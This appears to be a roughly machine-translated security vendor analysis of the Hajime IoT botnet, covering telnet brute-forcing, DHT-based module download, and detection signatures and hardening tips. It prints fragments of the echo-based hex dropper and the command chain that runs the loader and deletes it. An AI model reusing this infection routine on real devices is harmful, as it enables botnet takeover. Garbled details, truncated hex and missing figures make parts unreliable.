hajime sample technical analysis report

Posted by tzul at 2020-02-26

Reading: 2029

With the rapid development of science and technology, the number of IOT devices is also increasing. When these advanced equipment provide convenience for people, it also comes with some security risks. This has brought a huge market to lawbreakers, and they all want to get huge benefits from it. Just as the well-known Mirai unified the Jianghu, a new face named Hajime appeared and occupied a large market.


Hajime is similar to Mirai in that remote login is on the open port and logs in using the default user name and password. The difference is that Hajime is built on a point-to-point network, and the command module is propagated to the corresponding endpoint through the controller, so that the network it controls is more stable, and new functions can be added at any time.

executive summary

Hajime scans port 23 (telnet port) of random IP. Once it finds an IP that accepts the connection, it logs in by trying the embedded user name and password in the sample. Infection started after successful login. In the second stage, the peer-to-peer network will be added to obtain configuration files and scanners. This scanner will scan other vulnerable devices for infection and expand the scope of control.

Behavior description

Infective stage

Hajime scans randomly generated IPv4 addresses and tries to connect to their port 23. If the connection is successful, try to log in with the common user name and password.

Some user names and passwords are shown in the figure below, and see the appendix for details:

Once the login is successful, Hajime attempts to access the Linux shell by sending the following name:

The enable command is a privileged command, and the shell and sh commands indicate an attempt to run the Bourne shell. As long as any of these commands fail, Hajime's plan to try to access the Linux shell fails.

Once Hajime confirms the shell of the target device, it begins to analyze the target device. First, it checks the system mounts of the target file system for a writable address.

Use the command / bin / busybox repeatedly. In order to locate the end of the command line output, this feature is the same as Mirai.

Hajime will find a writable path as its working path to execute commands, and it will avoid using / proc, / sys or / these paths,

Through these lines of code, you can detect whether the binary code of the next stage already exists, whether the current working directory is writable, and finally retrieve the / bin / echo binary, so that Hajime can determine the processor structure of the target by detecting its header. Once the processor is determined, Hajime begins the next phase of code execution:



































Echo -ne



x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" > .s; /bin/busybox %s

Echo -ne



x0c\xd0\x8d\xe2\x00\x60\xa0\xe1\x70\x10\x8f\xe2\x10\x20\xa0\xe3" >> .s; /bin/busybox %s

Echo -ne



x2d\xe9\x0a\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x10\xd0\x8d\xe2" >> .s; /bin/busybox %s

Echo -ne



\x00\xef\x02\x00\x12\x1c\xc6\x33\x64\x7b\x41\x2a\x00\x00\x00\x61\x65\x61" >> .s; /bin/busybox %s

Echo -ne



x00\x2e\x74\x65\x78\x74\x00\x2e\x41\x52\x4d\x2e\x61\x74\x74\x72\x69\x62\x75" >> .s; /bin/busybox %s

Echo -ne




x00" >> .s; /bin/busybox %s

Echo -ne




x00" >> .s; /bin/busybox %s

Echo -ne


x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" >> .s; /bin/busybox %s

# cp .s .i; >.i; ./.s>.i; ./.i; rm .s; /bin/busybox %s

This binary code will connect to the attacker and write the received data to the standard output window, write to the. I file through the pipeline and execute. The IP and port to which this module connects are hard coded and embedded in the program, not resolved through the command line. Then the attack code needs to know the offset of embedded SOCKADDR in structure under different loads and different platforms.

DHT Downloader

The code in this stage obtains additional load and executes through the P2P connection established by the connection attacker. Hajime uses the DHT protocol of BitTorrent for connection and the Utorrent transport protocol for data exchange.


The main line of this phase starts from the functions conf init and conf check, so as to dynamically apply for and initialize the main configuration structure of kadnode.

First, do some initialization work to establish symbolic connection:

Then call the system function mprotect to modify the memory property:

From the memory space of the program, you can see the domain name string needed in the later stage:

The sample will try to visit for NTP query, and take the query result as the offset of local system time.

If the query fails, get the current time of the system instead.

Hide your behavior by generating child processes:

The above-mentioned time information obtained through NTP server, combined with the information read in / proc / net / route, communicates with neighboring nodes:

Prevent discovery by self deletion:

Use iptables to set up the network and delete the rule named "cwmp_cr" in the input chain.

FIFO file is created to store data when communicating with P2P protocol.

Find the configuration folder. P /. D, in which the configuration files left by the old version are stored when it is automatically updated. When this directory exists, its configuration files are used. When it does not exist, a directory is created to store the downloaded configuration files and module files.

Finally, give the control to the function main start, initialize DHT, set the main network handler, and finally start the main network loop.

Main operation logic

After reading the current profile and establishing a peer-to-peer relationship in DHT, Hajime retrieves the latest profile from it.

The Peer-to-Peer Search of BitTorrent DHT requires 160bit of "info" value. BitTorrent uses the SHA1 value of torrent's metadata to search. Hajime does not have torrent's metadata, so the value of "info" is obtained by the following algorithm:

For example, if the file name downloaded by Hajime is "example" and the time is 2016-10-1, first write the time as 1-9-116-6-274, then add - c3499c272730a7f807efb8676a92dcb6f8a3f8f, and finally search DHT to find 5dfd959c78d359272d46afd2e3069b34a9455ffd.

Hajime uses the above algorithm to search "config" to download the configuration file. The configuration file is downloaded and parsed every ten minutes. The downloaded configuration file for this debugging is as follows:


Hajime will download samples from the module list that match the platform. Once the download is complete, the file is cached in the. P folder and its "type" field is detected. 0x01 indicates that it is an update file of phase 2, which causes the currently running program of phase 2 to write its current configuration file to. P /. D. Other types indicate that the binary is an executable or module file.

The purpose of Hajime

When Hajime was discovered, it had controlled a large number of IOT devices, but never launched any DDoS attacks, so the purpose of hijacking devices by attackers was unknown. And after Hajime is installed on the device, he shuts down ports 2375555 and 5358. The command format is as follows:

These ports are the ports that IOT devices can be used to attack. This practice of Hajime really improves the security of the device. From this point of view, there is no malice, but it may also be to prevent other malicious programs from seizing resources with him. At present, hejime has not carried out DDoS attacks, which may be that the attacker is still trying to expand his control field. When the time is right, he may sell his DDoS service to others Someone else.

However, it can not be concluded that Hajime is a malicious program, because it has not launched a DDoS attack so far. After running the program, it will output the following information in the window:

From the information displayed, the author shows his identity as a white hat to consolidate some systems. So we can't exclude that the author of Hajime is indeed a white hat, and we just use this sample as a research project or interest to spread.

The difference with Mirai

In the infection stage, Hajime will read the user name and password in the order of the list to try to log in, while Mirai will randomly select a pair to try. Hajime did not use the system command to verify and access the shell when detecting the shell through the command.

The devices affected by Mirai use C & C communication to receive commands, while Hajime uses P2P network to communicate, resulting in less centralized botnet and more difficult to stop.

A small number of devices affected by Hajime use IOT devices with ARM chip structure, while those affected by Mirai use devices with arm, MIPs, x86 and six other platform chips. And Hajime also curbed the spread of Mirai to some extent.

Attack location

The domain name connected in the sample is a normal Utorrent domain name using P2P protocol, which cannot be used as an attack domain name. The IP address for domain name resolution is as follows:

The IP corresponding to is

The IP corresponding to is

test method

1. Hejime infects by logging in to telnet. When it logs in successfully, it will send the string enable \ R \ nshell \ R \ NSH \ R \ n.

For example:

0000002D  65 6e 61 62 6c 65 0d 0a  73 68 65 6c 6c 0d 0a 73   enable.. shell..s

0000003D  68 0d 0a                                          h..

The string cat / proc / mounts; / bin / busybox "% s" will also be sent \ R \ nwhere% s is a random string of 5 uppercase letters

For example:

00000040  63 61 74 20 2f 70 72 6f  63 2f 6d 6f 75 6e 74 73   cat /pro c/mounts

00000050  3b 20 2f 62 69 6e 2f 62  75 73 79 62 6f 78 20 4c  ; /bin/b usybox L

00000060  47 42 4c 55 0d 0a                              GBLU..

Therefore, the existence of BOT side can be confirmed by string.

2. The sample opens port 11152 and uses UDP protocol to send data, in which the port number is fixed, so the bot can be confirmed by detecting the port number.


Previous Mirai and this Hajime have shown that the security of the Internet of things is a problem that cannot be ignored and needs to be solved urgently. While we want manufacturers to improve the security of products, our users should also improve their security awareness and take certain protective measures.

Before buying IOT devices, first understand the performance and security functions of the devices, turn off unnecessary functions and services, disable telnet login and try to use SSH, audit IOT devices used in the network, and change the default information on the devices. Use strong password in device account and WiFi network. When setting up WiFi protected access (WPA), use strong encryption method. If not necessary, disable the router's universal plug and play function. Modify the default privacy and security settings of Internet of things devices according to their own needs. If not, disable or protect remote access to Internet of things devices. Try to use wired connection instead Wireless connection, regular firmware upgrade. I believe that by using the above measures, the safety of the equipment can be greatly improved.


Sheng Ming

This safety notice is only used to describe the possible safety problems. Lvmeng technology does not provide any guarantee or commitment for this safety notice. Any direct or indirect consequences and losses caused by the dissemination and use of the information provided by this safety announcement shall be borne by the user himself, and Lvmeng technology and the safety announcement author shall not bear any responsibility for this. Lvmeng technology has the right to modify and interpret the safety announcement. If you want to reprint or disseminate the safety notice, you must ensure the integrity of the safety notice, including the copyright notice and other contents. Without the permission of Lvmeng technology, it is not allowed to modify or increase or decrease the contents of this safety announcement, and it is not allowed to be used for commercial purposes in any way.

About Green Alliance Technology

Beijing Shenzhou Lvmeng Information Security Technology Co., Ltd. (referred to as Lvmeng Technology) was founded in April 2000, with its headquarters in Beijing. With more than more than 30 branches at home and abroad, it provides core competitive security products and solutions for users in the government, operators, finance, energy, Internet, education, medical and other industries, and helps customers realize safe and smooth operation of business.

Based on years of security research, Lvmeng technology provides customers with intrusion detection / protection, anti denial of service attack, remote security assessment, web security protection and other products and professional security services in the fields of network and terminal security, Internet basic security, compliance and security management.

Beijing Shenzhou Lvmeng Information Security Technology Co., Ltd. has been listed and traded on the growth enterprise market of Shenzhen Stock Exchange since January 29, 2014. The stock abbreviation: Lvmeng technology, stock code: 300369.

If you need to know more, you can join QQ group: 570982169 direct inquiry: 010-68438880